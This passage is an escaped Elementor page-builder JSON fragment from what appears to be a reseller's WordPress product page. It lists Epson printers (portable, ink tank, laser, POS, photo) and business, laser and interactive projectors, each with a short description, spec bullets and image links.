WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce WF-7711<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2420\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><\\/p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.<\\/p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Duplex printing up to A3 size<\\/li><li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li><li>4.3\\u201d Colour LCD Touch Panel<\\/li><li>Print, Scan, Copy Fax with ADF<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EcoTank L3150<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L120 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson M1100 Printer<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH 